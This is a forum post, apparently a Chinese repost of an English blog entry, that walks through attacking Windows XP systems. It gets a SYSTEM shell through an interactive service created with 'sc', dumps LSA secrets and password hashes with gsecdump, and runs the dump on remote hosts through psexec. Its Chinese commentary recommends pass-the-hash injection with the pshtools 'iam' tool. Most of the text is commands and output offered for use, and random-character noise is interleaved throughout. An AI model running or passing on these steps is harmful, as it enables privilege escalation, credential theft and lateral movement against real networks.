o get a DOS Prompt as NT system:
! b0 @' x% \" J. O8 E f6 y1 r0 A; U1 D
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
9 l, U7 F( H$ k& i) N8 ~[SC] CreateService SUCCESS
& S3 l: w4 }* L. N4 e1 v) V5 w: J$ G2 Y/ ~
C:\>sc start shellcmdline/ b0 s) j3 y. m! [9 k. f3 V( ~
[SC] StartService FAILED 1053:& _6 l" B3 [) k5 ~0 b
$ W) L$ \- L+ D- ~. Q/ \The service did not respond to the start or control request in a timely fashion.
; W8 n. `) P% p$ Z6 [: D
! I5 I5 Q+ H9 B' wC:\>sc delete shellcmdline
% B' x1 ]1 y3 b+ k/ k1 G[SC] DeleteService SUCCESS
! |. T9 h0 h* s! K8 @8 y5 Z3 O z) X
------------
" w5 h M5 }9 M. V) C
: H% D7 G4 f, L B9 k9 D; q% c4 AThen in the new DOS window:
' B/ t. p' t$ b& O% q9 d. ?* N
# ^' G* L; ^7 C$ ^Microsoft Windows XP [Version 5.1.2600]$ w- k, A3 S. L7 ~" p
(C) Copyright 1985-2001 Microsoft Corp." h! j3 ?. E5 `+ ?
; ^5 b$ `3 [$ B2 Y3 \% K( b' dC:\WINDOWS\system32>whoami
$ [" q- X9 j0 \& Y- hNT AUTHORITY\SYSTEM
4 {0 Q4 {7 y8 P4 ^% j7 x# i% _" ?
+ g% g Q9 I/ r% S4 AC:\WINDOWS\system32>gsecdump -h+ h! I# p) a( K( R2 p; T
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
3 c" ]: m2 W5 `! }" E/ o" w7 Z1 uusage: gsecdump [options]: M- J3 N& Y+ ^7 ^8 ^' @ k
5 Q' }1 G: V: q9 T( t! a
options:
h- x9 d* P, t0 r0 P3 c& J3 v2 M-h [ --help ] show help
) e9 ^: F, }' m2 Z. \1 t5 @& {/ t-a [ --dump_all ] dump all secrets( O& Z: t. M4 V- E
-l [ --dump_lsa ] dump lsa secrets7 [7 O- `3 v0 X" d( C6 j, C: I/ [
-w [ --dump_wireless ] dump microsoft wireless connections- f/ E# A' X9 r, U0 Y9 _( o* z
-u [ --dump_usedhashes ] dump hashes from active logon sessions& |6 e' o& k0 a
-s [ --dump_hashes ] dump hashes from SAM/AD
( p! W$ v* G8 |2 x# c% _) v" @3 [! B: O( W, V6 [! g: p3 F* [+ D" M' j/ l
Although I like to use:5 w5 d/ s0 y s o! o
$ W! D. h& Y9 ], yPsExec v1.83 - Execute processes remotely' ]( ]/ G" y, I4 S
Copyright (C) 2001-2007 Mark Russinovich
) w- I; s2 n/ \' G9 _Sysinternals - 链接标记[url]www.sysinternals.com[/url]
+ [8 H" F: | Y/ C1 g+ z3 ^* w" g
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
& O# Q- z$ O2 T7 \
3 A& }7 d, f, X5 Q# H8 b4 l4 ~to get the hashes from active logon sessions of a remote system.
8 F/ {8 k# i- b3 x) n" }1 ~
8 s, Q5 V" y, p- D7 HThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
& m( w: Z4 `, |" B2 s# j3 q6 }: W9 _& R d
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.7 k. ?6 H9 {- @
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
- O9 ]# W- |0 v8 h7 E% D
I3 o: P+ D7 q y$ j) d我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。3 E }* u N5 f6 V1 u
|